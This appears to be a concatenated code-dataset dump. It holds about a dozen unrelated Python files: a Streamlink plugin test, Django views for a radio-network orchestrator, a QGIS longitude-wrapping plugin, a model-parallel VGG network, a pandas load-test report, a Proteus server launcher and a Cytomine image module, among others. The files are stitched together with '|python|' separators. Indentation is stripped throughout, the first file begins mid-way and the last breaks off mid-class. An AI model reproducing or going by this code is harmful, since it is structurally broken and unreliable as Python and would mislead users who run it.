def test_re(text):
m = _m3u8_re.search(text)
self.assertTrue(m and len(m.group("url")) > 0)
test_re('file: "test" ')
test_re('file:"test"')
test_re('file : "test"')
test_re('file : "test" ')
test_re("file: 'test'")
test_re("file :'test'")
test_re("file : 'test'")
test_re("file : 'test'")
def test_can_handle_url(self):
# should match
self.assertTrue(Canlitv.can_handle_url("http://www.canlitv.plus/channel"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitv.com/channel"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitvlive.co/izle/channel.html"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitvlive.live/izle/channel.html"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitvlive.io/izle/channel.html"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitvlive.site/izle/channel.html"))
self.assertTrue(Canlitv.can_handle_url("http://www.ecanlitvizle.net/channel/"))
self.assertTrue(Canlitv.can_handle_url("http://www.ecanlitvizle.net/onizleme.php?kanal=channel"))
self.assertTrue(Canlitv.can_handle_url("http://www.ecanlitvizle.net/tv.php?kanal=channel"))
# shouldn't match
self.assertFalse(Canlitv.can_handle_url("http://www.canlitv.com"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitv.plus"))
self.assertFalse(Canlitv.can_handle_url("http://www.ecanlitvizle.net"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitvlive.co"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitvlive.live"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitvlive.io"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitvlive.site"))
self.assertFalse(Canlitv.can_handle_url("http://www.ecanlitvizle.net"))
|
python
|
"""
Open Orchestrator Cloud Radio Access Network
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.contrib import messages
from django.shortcuts import get_object_or_404, redirect, render
from operators.models import Operator
from pools.forms import PoolForm, AlertForm, SchedulerForm
from .models import Pool
from ns.models import Ns, Nvf
from bbus.models import Bbu
from scenarios.models import Scenario
from django.contrib.auth.decorators import login_required
from oocran.global_functions import paginator
from ues.models import Ue
from schedulers.models import Scheduler
from .tasks import celery_launch, celery_shut_down
from django.contrib.sites.shortcuts import get_current_site
import uuid
from alerts.models import Alert
@login_required(login_url='/login/')
def list(request):
scenarios = Scenario.objects.filter(operator__user=request.user)
scenarios = paginator(request, scenarios)
context = {
"user": request.user,
"object_list": scenarios,
}
return render(request, "pools/list.html", context)
@login_required(login_url='/login/')
def create(request, id=None):
scenario = get_object_or_404(Scenario, id=id)
form = PoolForm(request.POST or None, request.FILES or None)
if form.is_valid():
try:
Ns.objects.get(operator__user=request.user, name=form.cleaned_data['name'])
messages.success(request, "Name repeated!", extra_tags="alert alert-danger")
except:
ns = form.save(commit=False)
ns.operator = get_object_or_404(Operator, user=request.user)
ns.scenario = scenario
[reply, tag] = ns.create()
messages.success(request, reply, extra_tags=tag)
return redirect("scenarios:scenario", id=id)
if form.errors:
messages.success(request, form.errors, extra_tags="alert alert-danger")
return redirect("scenarios:scenario", id=id)
context = {
"user": request.user,
"form": form,
"scenario": scenario,
}
return render(request, "pools/form.html", context)
@login_required(login_url='/login/')
def delete(request, id=None):
utran = get_object_or_404(Pool, id=id)
id = utran.scenario.id
try:
utran.delete_influxdb_database()
except:
print "database does not exist!"
utran.scenario.total_infras -= 1
utran.scenario.save()
if utran.status == "Running":
celery_shut_down.delay(id, action="delete")
utran.scenario.active_infras -= 1
else:
print "delete"
utran.delete()
messages.success(request, "Pool successfully deleted!", extra_tags="alert alert-success")
return redirect("scenarios:scenario", id=id)
@login_required(login_url='/login/')
def launch(request, id=None):
pool = get_object_or_404(Pool, id=id)
celery_launch.delay(id)
messages.success(request, "Pool successfully Launched!", extra_tags="alert alert-success")
return redirect("pools:details", id=pool.scenario.id)
@login_required(login_url='/login/')
def shut_down(request, id=None):
utran = get_object_or_404(Pool, id=id)
utran.scenario.active_infras -= 1
utran.scenario.save()
celery_shut_down.delay(id)
messages.success(request, "Pool shut down!", extra_tags="alert alert-success")
return redirect("pools:details", id=utran.scenario.id)
@login_required(login_url='/login/')
def details(request, id=None):
pool = get_object_or_404(Pool, id=id)
bbus = Bbu.objects.filter(ns=pool)
ues = Ue.objects.filter(scenario=pool.scenario)
schedulers = Scheduler.objects.filter(ns=pool)
schedulers = paginator(request, schedulers)
alerts = Alert.objects.filter(ns=pool)
alerts = paginator(request, alerts)
context = {
"user": request.user,
"utran": pool,
"ues": ues,
"alerts": alerts,
"bbus": bbus,
"schedulers": schedulers,
"url": get_current_site(request).domain.split(':')[0],
}
return render(request, "pools/detail.html", context)
@login_required(login_url='/login/')
def alert(request, id=None):
utran = get_object_or_404(Pool, id=id)
form = AlertForm(request.POST or None, nvfs=Bbu.objects.filter(ns=utran))
if form.is_valid():
try:
Alert.objects.get(operator__user=request.user, name=form.cleaned_data['name'])
messages.success(request, "Name repeated!", extra_tags="alert alert-danger")
except:
alert = form.save(commit=False)
alert.operator = get_object_or_404(Operator, user=request.user)
alert.scenario = utran.scenario
alert.ns = utran
alert.uuid = uuid.uuid4().hex
alert.save()
for id in form.cleaned_data['nvfs']:
alert.nvfs.add(get_object_or_404(Nvf, id=id))
messages.success(request, "Alert created successfully!", extra_tags="alert alert-success")
return redirect("pools:details", id=utran.id)
if form.errors:
messages.success(request, form.errors, extra_tags="alert alert-danger")
return redirect("pools:details", id=utran.id)
context = {
"user": request.user,
"utran": utran,
"form": form,
}
return render(request, "pools/alert.html", context)
@login_required(login_url='/login/')
def scheduler(request, id=None):
utran = get_object_or_404(Pool, id=id)
form = SchedulerForm(request.POST or None, nvfs=Bbu.objects.filter(ns=utran))
if form.is_valid():
try:
Scheduler.objects.get(operator__user=request.user, name=form.cleaned_data['name'])
messages.success(request, "Name repeated!", extra_tags="alert alert-danger")
except:
scheduler = form.save(commit=False)
scheduler.operator = get_object_or_404(Operator, user=request.user)
scheduler.scenario = utran.scenario
scheduler.type = "nvf"
scheduler.ns = utran
scheduler.save()
for id in form.cleaned_data['nvfs']:
scheduler.nvfs.add(get_object_or_404(Nvf, id=id))
messages.success(request, "Scheduler created successfully!", extra_tags="alert alert-success")
return redirect("pools:details", id=utran.id)
if form.errors:
messages.success(request, form.errors, extra_tags="alert alert-danger")
return redirect("pools:details", id=utran.id)
context = {
"user": request.user,
"utran": utran,
"form": form,
}
return render(request, "pools/scheduler.html", context)
|
python
|
from greent.rosetta import Rosetta
import json
from collections import defaultdict
def setup():
rosetta = Rosetta()
    neodriver = rosetta.type_graph.driver
return neodriver
def dumpem(dtype = 'gene'):
driver = setup()
cypher = f'MATCH (a:{dtype})-[r]-(b) return a,r,b'
with driver.session() as session:
result = session.run(cypher)
records = list(result)
genes = defaultdict(list)
for record in records:
gid = record['a']['id']
edgetype= record['r'].type
other = record['b']['id']
genes[gid].append( {'predicate': edgetype, 'node': other})
with open('genedump.json','w') as outf:
json.dump(genes,outf,indent=4)
if __name__ == '__main__':
dumpem()
|
python
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
GeometryWrapper
A QGIS plugin
Converts geometry longitude from [-180,180] to [0,360]
-------------------
begin : 2017-03-16
git sha : $Format:%H$
copyright : (C) 2017 by Jonah
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt5.QtCore import QFileInfo
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QAction, QFileDialog, QMessageBox
# Initialize Qt resources from file resources.py
from .resources import *
# Import the code for the dialog
from .geometry_wrapper_dialog import GeometryWrapperDialog
import os
from .utils import process_raster_file, process_vector_file
from .utils import process_vector_layer
from qgis.core import QgsRasterLayer, QgsVectorLayer, QgsProject, QgsVectorFileWriter
try:
from qgis.core import QgsMapLayerType
except ImportError:
from qgis.core import QgsMapLayer
QgsMapLayerType = QgsMapLayer.LayerType
class GeometryWrapper:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# Declare instance attributes
self.actions = []
self.menu = u'&Geometry Wrapper'
self.toolbar = self.iface.addToolBar(u'GeometryWrapper')
self.toolbar.setObjectName(u'GeometryWrapper')
# listen for browse button
self.dlg = GeometryWrapperDialog()
self.dlg.input_button.clicked.connect(self.set_in_dataset)
# initialise other variables
self.selected_tab = None
self.input_dataset = None
self.input_layer = None
self.data_type = None
self.longitude_range = None
self.output_file = None
self.output_layer = None
def add_action(
self,
icon_path,
text,
callback,
enabled_flag=True,
add_to_menu=True,
add_to_toolbar=True,
status_tip=None,
whats_this=None,
parent=None):
"""Add a toolbar icon to the toolbar.
:param icon_path: Path to the icon for this action. Can be a resource
path (e.g. ':/plugins/foo/bar.png') or a normal file system path.
:type icon_path: str
:param text: Text that should be shown in menu items for this action.
:type text: str
:param callback: Function to be called when the action is triggered.
:type callback: function
:param enabled_flag: A flag indicating if the action should be enabled
by default. Defaults to True.
:type enabled_flag: bool
:param add_to_menu: Flag indicating whether the action should also
be added to the menu. Defaults to True.
:type add_to_menu: bool
:param add_to_toolbar: Flag indicating whether the action should also
be added to the toolbar. Defaults to True.
:type add_to_toolbar: bool
:param status_tip: Optional text to show in a popup when mouse pointer
hovers over the action.
:type status_tip: str
:param parent: Parent widget for the new action. Defaults None.
:type parent: QWidget
:param whats_this: Optional text to show in the status bar when the
mouse pointer hovers over the action.
:returns: The action that was created. Note that the action is also
added to self.actions list.
:rtype: QAction
"""
# Create the dialog (after translation) and keep reference
icon = QIcon(icon_path)
action = QAction(icon, text, parent)
action.triggered.connect(callback)
action.setEnabled(enabled_flag)
if status_tip is not None:
action.setStatusTip(status_tip)
if whats_this is not None:
action.setWhatsThis(whats_this)
if add_to_toolbar:
self.toolbar.addAction(action)
if add_to_menu:
self.iface.addPluginToMenu(
self.menu,
action)
self.actions.append(action)
return action
def initGui(self):
"""Create the menu entries and toolbar icons inside the QGIS GUI."""
icon_path = os.path.join(self.plugin_dir, "icon.png")
self.add_action(
icon_path,
text=u'Geometry Wrapper',
callback=self.run,
parent=self.iface.mainWindow())
def unload(self):
"""Removes the plugin menu item and icon from QGIS GUI."""
for action in self.actions:
self.iface.removePluginMenu(
u'&Geometry Wrapper',
action)
self.iface.removeToolBarIcon(action)
# remove the toolbar
del self.toolbar
# display file dialog to select input dataset
def set_in_dataset(self):
input_name = QFileDialog.getOpenFileName(None,
'Select input dataset',
'',
"raster or vector (*.shp *.tif)",
)
        # proceed only if the user actually selected a file (an empty selection is skipped)
        if input_name and input_name[0]:
self.input_dataset = QFileInfo(input_name[0]).absoluteFilePath()
self.dlg.input_dataset.setText(QFileInfo(input_name[0]).absoluteFilePath())
def run(self):
"""Run method that performs all the real work"""
# clear the input_dataset field
self.dlg.input_dataset.clear()
# show the dialog
self.dlg.show()
# set up an empty message box
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setWindowTitle("Geometry Wrapper")
msg.setStandardButtons(QMessageBox.Ok)
# Run the dialog event loop
result = self.dlg.exec_()
# See if OK was pressed
if result:
# set output longitude range
self.longitude_range = 0
if self.dlg.radio_button180.isChecked():
self.longitude_range = '180'
elif self.dlg.radio_button360.isChecked():
self.longitude_range = '360'
# check whether file or layer tab is selected
if self.dlg.file_layer_tab_widget.currentIndex() == 1:
self.selected_tab = "file"
else:
self.selected_tab = "layer"
if self.selected_tab == "file":
# process file
self.data_type = ''
file_name = self.input_dataset
file_info = QFileInfo(self.input_dataset)
raster_layer = QgsRasterLayer(file_name)
vector_layer = QgsVectorLayer(file_name, "ogr")
if raster_layer.isValid():
self.data_type = 'raster'
if not raster_layer.crs().isGeographic():
msg.setText("Input dataset must have geographic coordinate system (such as WGS84)")
msg.exec_()
self.run()
elif vector_layer.isValid():
self.data_type = 'vector'
if not vector_layer.crs().isGeographic():
msg.setText("Input dataset must have geographic coordinate system (such as WGS84)")
msg.exec_()
self.run()
# send data for processing
if self.data_type == 'vector':
self.output_file = self.input_dataset.split(os.extsep)[0] + "_" + str(self.longitude_range) + ".shp"
if os.path.exists(self.output_file):
msg.setText("Cannot overwrite existing file " + os.path.basename(self.output_file))
msg.exec_()
self.run()
else:
vector_layer = process_vector_file(self.input_dataset, self.longitude_range)
writer = QgsVectorFileWriter.writeAsVectorFormat(vector_layer,
self.output_file,
"utf-8",
vector_layer.crs(),
"ESRI Shapefile")
base_name = file_info.baseName() + "_" + str(self.longitude_range)
if self.dlg.add_to_toc.isChecked():
self.output_layer = QgsVectorLayer(self.output_file, base_name, "ogr")
if self.output_layer.isValid():
QgsProject.instance().addMapLayer(self.output_layer)
elif self.data_type == 'raster':
self.output_file = self.input_dataset.split(os.extsep)[0] + "_" + str(self.longitude_range) + ".tif"
if os.path.exists(self.output_file):
msg.setText("Cannot overwrite existing file " + os.path.basename(self.output_file))
msg.exec_()
self.run()
else:
process_raster_file(self.input_dataset, self.longitude_range, self.output_file)
file_info = QFileInfo(self.output_file)
base_name = file_info.baseName()
if self.dlg.add_to_toc.isChecked():
self.output_layer = QgsRasterLayer(self.output_file, base_name)
if self.output_layer.isValid():
QgsProject.instance().addMapLayer(self.output_layer)
elif self.selected_tab == "layer":
# process layer
self.input_layer = self.dlg.layer_combobox.currentLayer()
if self.input_layer.type() == QgsMapLayerType.VectorLayer:
self.data_type = "vector"
elif self.input_layer.type() == QgsMapLayerType.RasterLayer:
self.data_type = "raster"
else:
msg.setText("Input dataset must be vector or raster")
msg.exec_()
if not self.input_layer.crs().isGeographic():
msg.setText("Input dataset must have geographic coordinate system (such as WGS84)")
msg.exec_()
else:
if self.input_layer.isValid():
if self.data_type == "vector":
self.output_layer = process_vector_layer(self.input_layer, self.longitude_range)
else:
raster_in_file = self.input_layer.dataProvider().dataSourceUri()
if os.path.exists(raster_in_file):
raster_out_file = os.path.join(raster_in_file.split(os.extsep)[0] + "_" + str(self.longitude_range) + os.extsep + raster_in_file.split(os.extsep)[1])
self.output_layer = process_raster_file(raster_in_file, self.longitude_range, raster_out_file)
else:
msg.setText("Input layer is not valid for some reason")
msg.exec_()
QgsProject.instance().addMapLayer(self.output_layer)
|
python
|
# Generated by Django 3.0.5 on 2020-04-06 15:06
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shortner', '0002_auto_20200331_0717'),
]
operations = [
migrations.AlterModelOptions(
name='entry',
options={'verbose_name_plural': 'entries'},
),
]
|
python
|
from numpy import diff
def check_sorted(values):
    """Return True if the flattened array is monotone (entirely non-increasing or non-decreasing)."""
    deltas = diff(values.ravel())
    return (deltas <= 0).all() or (0 <= deltas).all()
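# Usage sketch: the check passes for monotone arrays (entirely non-increasing or
# non-decreasing in flattened order) and fails otherwise.
if __name__ == "__main__":
    from numpy import array
    print(check_sorted(array([1, 2, 2, 3])))  # True  (non-decreasing)
    print(check_sorted(array([3, 2, 1])))     # True  (non-increasing)
    print(check_sorted(array([1, 3, 2])))     # False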
|
python
|
'''VGG for CIFAR10. FC layers are removed.
(c) YANG, Wei
'''
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import math
import torch
__all__ = ['vgg19_bn_para']
class VGG(nn.Module):
def __init__(self, features, gpu_num = 2, num_classes=1000, split_size=64):
super(VGG, self).__init__()
self.split_size = split_size
self.gpu_para = gpu_num
        # NOTE: weights are initialized at the end of __init__, after all sub-modules are registered
if gpu_num == 0:
self.features = features.cuda("cuda:0")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:0")
if gpu_num == 2:
self.features_1 = features[0:27].cuda("cuda:0")
self.features_2 = features[27:].cuda("cuda:1")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:1")
elif gpu_num == 4:
self.features_1 = features[0:14].cuda("cuda:0")
self.features_2 = features[14:27].cuda("cuda:1")
self.features_3 = features[27:40].cuda("cuda:2")
self.features_4 = features[40:].cuda("cuda:3")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:3")
elif gpu_num == 10:
self.features_1 = features[0:3].cuda("cuda:0")
self.features_2 = features[3:7].cuda("cuda:1")
self.features_3 = features[7:10].cuda("cuda:2")
self.features_4 = features[10:14].cuda("cuda:3")
self.features_5 = features[14:20].cuda("cuda:4")
self.features_6 = features[20:27].cuda("cuda:5")
self.features_7 = features[27:33].cuda("cuda:6")
self.features_8 = features[33:40].cuda("cuda:7")
self.features_9 = features[40:49].cuda("cuda:8")
self.features_10 = features[49:].cuda("cuda:9")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:9")
elif gpu_num == 5:
self.features_1 = features[0:10].cuda("cuda:0")
self.features_2 = features[10:20].cuda("cuda:1")
self.features_3 = features[20:30].cuda("cuda:2")
self.features_4 = features[30:40].cuda("cuda:3")
self.features_5 = features[40:].cuda("cuda:4")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:4")
def forward(self, x):
if self.gpu_para == 4:
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.features_1(s_next).cuda("cuda:1")
ret = []
for s_next in splits:
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
s_prev = self.features_1(s_next).cuda("cuda:1")
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
x = torch.cat(ret)
elif self.gpu_para == 0:
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
elif self.gpu_para == 2:
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.features_1(s_next).cuda("cuda:1")
ret = []
for s_next in splits:
s_prev = self.features_2(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
s_prev = self.features_1(s_next).cuda("cuda:1")
s_prev = self.features_2(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
x = torch.cat(ret)
elif self.gpu_para == 10:
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.features_1(s_next).cuda("cuda:1")
ret = []
for s_next in splits:
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev).cuda("cuda:4")
s_prev = self.features_5(s_prev).cuda("cuda:5")
s_prev = self.features_6(s_prev).cuda("cuda:6")
s_prev = self.features_7(s_prev).cuda("cuda:7")
s_prev = self.features_8(s_prev).cuda("cuda:8")
s_prev = self.features_9(s_prev).cuda("cuda:9")
s_prev = self.features_10(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
s_prev = self.features_1(s_next).cuda("cuda:1")
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev).cuda("cuda:4")
s_prev = self.features_5(s_prev).cuda("cuda:5")
s_prev = self.features_6(s_prev).cuda("cuda:6")
s_prev = self.features_7(s_prev).cuda("cuda:7")
s_prev = self.features_8(s_prev).cuda("cuda:8")
s_prev = self.features_9(s_prev).cuda("cuda:9")
s_prev = self.features_10(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
x = torch.cat(ret)
elif self.gpu_para == 5:
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.features_1(s_next).cuda("cuda:1")
ret = []
for s_next in splits:
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev).cuda("cuda:4")
s_prev = self.features_5(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
s_prev = self.features_1(s_next).cuda("cuda:1")
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev).cuda("cuda:4")
s_prev = self.features_5(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
x = torch.cat(ret)
else:
x = self.features_1(x)
x = self.features_2(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
n = m.weight.size(1)
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def make_layers(cfg, gpu_para, batch_norm=False):
layers = []
in_channels = 3
for index, v in enumerate(cfg):
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def vgg19_bn_para(num_classes=10, gpu_num = 2, split_size=64):
"""VGG 19-layer model (configuration 'E') with batch normalization"""
model = VGG(make_layers(cfg['E'], 2, batch_norm=True), gpu_num = gpu_num, num_classes=num_classes, split_size=split_size)
return model
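# Hypothetical usage sketch (gpu_num=2 requires two CUDA devices; split_size is the
# micro-batch size used to pipeline the two model halves):
if __name__ == '__main__':
    model = vgg19_bn_para(num_classes=10, gpu_num=2, split_size=64)
    x = torch.randn(128, 3, 32, 32).cuda("cuda:0")
    out = model(x)
    print(out.shape)  # torch.Size([128, 10])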
|
python
|
# one way to import a module with a longer name under a shorter alias
import mape.helper as helper
# imports a specific function so it can be used as if it were defined locally
#from helper import ievadiSkaitli
def main():
sk1 = helper.ievadiSkaitli()
sk2 = helper.ievadiSkaitli()
print("Ievadīto skaitļu summa ir", sk1 + sk2)
helper.pievienotFailam("summa.dat", sk1 + sk2)
#print(__name__)
if __name__ == '__main__':
main()
else:
print("Šī programma nav domāta importam")
|
python
|
import six
import time
from collections import defaultdict
import ujson as json
import pandas as pd
from oct.results.models import db, Result, Turret
class ReportResults(object):
"""Represent a report containing all tests results
:param int run_time: the run_time of the script
:param int interval: the time interval between each group of results
"""
def __init__(self, run_time, interval):
self.total_transactions = 0
self.total_errors = Result.select(Result.id).where(Result.error != "", Result.error != None).count()
self.total_timers = 0
self.timers_results = {}
self._timers_values = defaultdict(list)
self.turrets = []
self.main_results = {}
self.interval = interval
self._init_turrets()
def _init_dates(self):
"""Initialize all dates properties
"""
if self.total_transactions == 0:
return None
self.epoch_start = Result.select(Result.epoch).order_by(Result.epoch.asc()).limit(1).get().epoch
self.epoch_finish = Result.select(Result.epoch).order_by(Result.epoch.desc()).limit(1).get().epoch
self.start_datetime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.epoch_start))
self.finish_datetime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.epoch_finish))
def _init_dataframes(self):
"""Initialise the main dataframe for the results and the custom timers dataframes
"""
df = pd.read_sql_query("SELECT elapsed, epoch, scriptrun_time, custom_timers FROM result ORDER BY epoch ASC",
db.get_conn())
self._get_all_timers(df)
self.main_results = self._get_processed_dataframe(df)
# create all custom timers dataframes
for key, value in six.iteritems(self._timers_values):
df = pd.DataFrame(value, columns=['epoch', 'scriptrun_time'])
df.index = pd.to_datetime(df['epoch'], unit='s')
timer_results = self._get_processed_dataframe(df)
self.timers_results[key] = timer_results
# clear memory
del self._timers_values
def _get_all_timers(self, dataframe):
"""Get all timers and set them in the _timers_values property
:param pandas.DataFrame dataframe: the main dataframe with row results
"""
s = dataframe['custom_timers'].apply(json.loads)
s.index = dataframe['epoch']
for index, value in s.iteritems():
if not value:
continue
for key, value in six.iteritems(value):
self._timers_values[key].append((index, value))
self.total_timers += 1
del dataframe['custom_timers']
del s
def _get_processed_dataframe(self, dataframe):
"""Generate required dataframe for results from raw dataframe
:param pandas.DataFrame dataframe: the raw dataframe
:return: a dict containing raw, compiled, and summary dataframes from original dataframe
:rtype: dict
"""
dataframe.index = pd.to_datetime(dataframe['epoch'], unit='s', utc=True)
del dataframe['epoch']
summary = dataframe.describe(percentiles=[.80, .90, .95]).transpose().loc['scriptrun_time']
df_grp = dataframe.groupby(pd.TimeGrouper('{}S'.format(self.interval)))
df_final = df_grp.apply(lambda x: x.describe(percentiles=[.80, .90, .95])['scriptrun_time'])
return {
"raw": dataframe.round(2),
"compiled": df_final.round(2),
"summary": summary.round(2)
}
def _init_turrets(self):
"""Setup data from database
"""
for turret in Turret.select():
self.turrets.append(turret.to_dict())
def compile_results(self):
"""Compile all results for the current test
"""
self._init_dataframes()
self.total_transactions = len(self.main_results['raw'])
self._init_dates()
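# Hypothetical usage sketch (assumes the peewee database behind oct.results.models is
# already connected and populated with Result/Turret rows from a finished run):
if __name__ == '__main__':
    report = ReportResults(run_time=60, interval=10)
    report.compile_results()
    print(report.total_transactions, report.total_errors)
    print(report.main_results['summary'])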
|
python
|
# Code generated by `typeddictgen`. DO NOT EDIT.
"""V1SubjectRulesReviewStatusDict generated type."""
from typing import TypedDict, List
from kubernetes_typed.client import V1NonResourceRuleDict, V1ResourceRuleDict
V1SubjectRulesReviewStatusDict = TypedDict(
"V1SubjectRulesReviewStatusDict",
{
"evaluationError": str,
"incomplete": bool,
"nonResourceRules": List[V1NonResourceRuleDict],
"resourceRules": List[V1ResourceRuleDict],
},
total=False,
)
|
python
|
# Copyright 2021 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provides the Server class.
Classes:
Server - provides methods to start/stop the Proteus server
"""
import os
import subprocess
from typing import Optional
import shutil
from .exceptions import InvalidArgument
class Server:
"""
The Server class provides methods to control the Proteus server.
"""
def __init__(self, executable: Optional[str] = None, http_port: int = 8998):
"""
Construct a server object
Args:
http_port (int): HTTP port to use for the server
"""
self.pid: int = 0
self.http_port = http_port
self.executable = None
if executable is None:
root = os.getenv("PROTEUS_ROOT")
if root is not None:
try:
with open(root + "/build/config.txt", "r") as f:
build = f.read().replace("\n", "").split(" ")[0]
except FileNotFoundError:
build = "Debug" # try for Debug by default
local_server_path = f"{root}/build/{build}/src/proteus/proteus-server"
if os.path.exists(local_server_path):
self.executable = local_server_path
if self.executable is None:
if shutil.which("proteus-server") is None:
raise InvalidArgument(
"Path to proteus-server cannot be derived. Specify the path explicitly or add it to the PATH"
)
else:
# use the proteus-server that exists on the PATH
self.executable = "proteus-server"
else:
self.executable = executable
def start(self, quiet=False):
"""
Start the proteus server
Args:
quiet (bool, optional): Suppress all output if True. Defaults to False.
"""
proteus_command = [self.executable, "--http_port", str(self.http_port)]
if quiet:
p = subprocess.Popen(
proteus_command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
else:
p = subprocess.Popen(proteus_command)
self.pid = p.pid
def stop(self, kill=False):
"""
Stop the proteus server
Args:
kill (bool, optional): Use signal 9 to kill. Defaults to False.
"""
signal = "-9" if kill else "-2"
if self.pid:
subprocess.call(["kill", signal, str(self.pid)])
self.pid = 0
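# Minimal usage sketch (an assumption, not part of the original module): it relies on a
# proteus-server binary being resolvable through PROTEUS_ROOT or the PATH, as described
# in Server.__init__ above.
#
#   server = Server(http_port=8998)
#   server.start(quiet=True)   # spawns the proteus-server subprocess
#   ...                        # talk to the server over HTTP on port 8998
#   server.stop()              # SIGINT by default; stop(kill=True) sends SIGKILL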
|
python
|
import os
from abc import abstractmethod
from collections import defaultdict
import PIL
import cv2
import math
import numpy as np
import sldc
import torch
from PIL import Image
from cytomine.models import Annotation
from rasterio.features import rasterize
from shapely import wkt
from shapely.affinity import translate, affine_transform
from shapely.geometry import box
from shapely.geometry.base import BaseGeometry
from sldc import TileTopology
from sldc.image import FixedSizeTileTopology, DefaultTileBuilder
from sldc_cytomine import CytomineTileBuilder, CytomineSlide
from torch.utils.data import DataLoader
from torch.utils.data.dataset import Dataset
from torchvision import transforms
class PilImage(sldc.Image):
def __init__(self, filepath):
self._filepath = filepath
self._image = cv2.imread(self._filepath)[:, :, ::-1]
@property
def image(self):
return self._image
@property
def height(self):
return self.image.shape[0]
@property
